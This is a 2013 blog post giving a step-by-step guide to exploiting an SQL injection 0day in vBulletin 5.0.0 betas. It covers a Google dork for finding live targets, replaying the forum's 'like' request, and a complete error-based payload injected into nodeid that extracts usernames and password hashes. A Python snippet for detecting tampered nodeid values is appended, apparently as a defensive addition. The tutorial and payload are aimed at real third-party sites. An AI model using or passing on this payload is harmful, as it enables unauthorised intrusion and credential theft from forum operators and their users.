Friday, September 20, 2013

vBulletin 5 Beta XX SQLi 0day

Hello friends, I'll show how to exploit the SQLi vulnerability in vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28.

Things you will need:
1. The Live HTTP Headers add-on: download it from here and install it in Firefox
2. Google Dork: "Powered by vBulletin? Version 5.0.0 Beta"

Once you find a site, register and log in.

Now click on any post; there you will see a like button like this:
Now open the Live HTTP Headers add-on that we installed in Firefox.

Now click on the like button; you will see something like this:

Now click on the vote line and press Replay. You will see this:
Now, after nodeid=8361 (the number will be different for you), paste this code:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Now click on Replay and you will see the username and pass hash.
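Seen from the server side, the replayed request is a vote request whose nodeid parameter no longer holds an integer. The Python below is an added example, not part of the original post and not vBulletin code: it flags any nodeid value in a form-encoded request body that is not a plain integer and tags the error-based SQL markers visible in the payload above. The function name, the marker names, the 10-digit limit and the sample bodies are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, quote_plus

# A legitimate node id is a short run of ASCII digits (length limit is an assumption).
NODEID_OK = re.compile(r"[0-9]{1,10}")

# Markers of the error-based technique visible in the payload above.
MARKERS = {
    "information_schema": re.compile(r"information_schema", re.I),
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}

def inspect_nodeid(body):
    """Return a list of findings for a form-encoded body or query string.

    Every nodeid value is checked, so a clean value followed by a second,
    tampered nodeid parameter is still reported. parse_qs undoes the
    percent-encoding and '+' before the checks run.
    """
    findings = []
    for value in parse_qs(body, keep_blank_values=True).get("nodeid", []):
        if NODEID_OK.fullmatch(value):
            continue  # plain integer: nothing to report
        hits = sorted(name for name, rx in MARKERS.items() if rx.search(value))
        findings.append({"value": value, "markers": hits})
    return findings

# Constructed sample bodies, not captured traffic.
SAMPLE_BODIES = [
    "nodeid=8361",
    "nodeid=" + quote_plus(
        "8361) and(select 1 from(select count(*),concat(0x7e,floor(rand(0)*2))x "
        "from information_schema.tables group by x)a) AND (1338=1338"
    ),
    "nodeid=12&nodeid=12%27",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        for f in inspect_nodeid(body):
            print("ALERT nodeid=%r markers=%s" % (f["value"][:40], f["markers"]))
```

A non-integer nodeid with no markers is still worth an alert: the integer check is the primary control and the markers only help triage.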


